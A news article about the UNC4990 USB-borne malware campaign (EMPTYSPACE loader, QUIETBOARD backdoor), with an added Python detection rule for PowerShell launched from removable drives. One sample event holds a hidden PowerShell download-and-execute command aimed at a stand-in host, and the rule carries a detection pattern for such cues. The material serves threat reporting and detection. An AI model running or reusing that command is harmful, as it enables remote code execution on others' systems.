No phishing: Italian hackers infect local organizations in a very old-fashioned way

The UNC4990 group proved that even obsolete techniques are still quite effective.

Cybercriminals known as UNC4990 have been active in Italy, using infected USB devices to attack various industries, including healthcare, transportation, construction and logistics. This was announced by Mandiant on January 30.

The UNC4990 group, which has been active since the end of 2020, is believed to be based in Italy and uses Italian infrastructure for command and control (C2) of its operations. The main attack method is to distribute malicious software via USB devices, which then leads to the installation of the EMPTYSPACE loader.

Attackers use sites such as GitHub, Vimeo, and Ars Technica to host additional payloads, which are downloaded from these sites and decrypted using PowerShell.

The ultimate goals of UNC4990 are still unclear, although in one of the cases, experts identified the use of a cryptocurrency miner, which may indicate the financial motives of the group.

In early December, the same malicious campaign was documented by researchers from Fortgale and Yoroi. Infection starts when the victim runs a malicious LNK file on a removable USB device, which launches the PowerShell script responsible for downloading EMPTYSPACE from a remote server.
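The infection chain above (an LNK on removable media launching a PowerShell download stage) leaves a recognisable trace in endpoint process-creation telemetry. The following is an added example, not code from the report or from either vendor: it runs a simple detection rule over constructed Sysmon-style events, assuming the field names shown and an assumed set of drive letters (`E:`, `F:`) known to be removable.

```python
import re

# Constructed Sysmon-style process-creation events (simplified); field names and
# values are assumptions for this example, not data from the Mandiant or Yoroi reports.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iex (iwr https://example.invalid/stage1)\"",
     "CurrentDirectory": "E:\\"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1",
     "CurrentDirectory": "C:\\Users\\alice"},
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe E:\\readme.txt",
     "CurrentDirectory": "E:\\"},
]

# Drive letters currently mounted as removable media. In practice this comes from the
# endpoint's drive inventory; the value here is assumed for the example.
REMOVABLE_DRIVES = {"E:", "F:"}

# Command-line cues that a script fetches and runs remote or encoded content.
DOWNLOAD_CUES = re.compile(
    r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|iex|Invoke-Expression|"
    r"FromBase64String)\b|(^|\s)-(e|ec|enc|encodedcommand)\s",
    re.IGNORECASE,
)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def touches_removable(event, removable):
    text = event["CommandLine"] + " " + event["CurrentDirectory"]
    return any(re.search(re.escape(d) + r"\\", text, re.IGNORECASE) for d in removable)

def classify(event, removable=REMOVABLE_DRIVES):
    """Return the reasons this event matches the USB-launched PowerShell pattern ([] = no match)."""
    if basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    # A double-clicked LNK is started by the shell, so explorer.exe is the parent process.
    if basename(event["ParentImage"]) == "explorer.exe":
        reasons.append("launched by explorer.exe (consistent with an LNK double-click)")
    if DOWNLOAD_CUES.search(event["CommandLine"]):
        reasons.append("download/execute cue in command line")
    # Alert only when the launch is tied to removable media and carries another signal.
    if reasons and touches_removable(event, removable):
        reasons.append("working directory or arguments on a removable drive")
        return reasons
    return []

def scan(events, removable=REMOVABLE_DRIVES):
    """Return (index, reasons) for every event that matches the rule."""
    return [(i, classify(e, removable)) for i, e in enumerate(events) if classify(e, removable)]
```

Only the first constructed event is flagged; the legitimate scheduled script and the notepad launch from the same USB stick pass silently.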

Yoroi identified four variants of EMPTYSPACE, written in Golang, .NET, Node.js and Python. These variants are used to download the next stages of malware from the C2 server, including QUIETBOARD.

QUIETBOARD is a Python backdoor with a wide range of features, from executing arbitrary commands to changing cryptocurrency wallet addresses and collecting information about the system. The backdoor is also able to spread to removable drives and take screenshots.

Although attackers use popular sites to host their malware, Mandiant experts assure that the content of these sites does not pose a direct threat to ordinary users, since the hosted programs are harmless in isolation.

Analysis of EMPTYSPACE and QUIETBOARD also shows that attackers use a modular approach in the development of their tools, demonstrating an experimental approach and adaptability.

This incident proves that even plainly old methods of compromise, such as the distribution of infected USB media, still work effectively, and built-in security systems often fail to recognize them.

Such attacks indicate the need for continuous improvement of cyber defense measures in order to stay ahead of hackers' actions. Only an integrated approach, combining technologies, processes and the human factor, can ensure the proper level of security.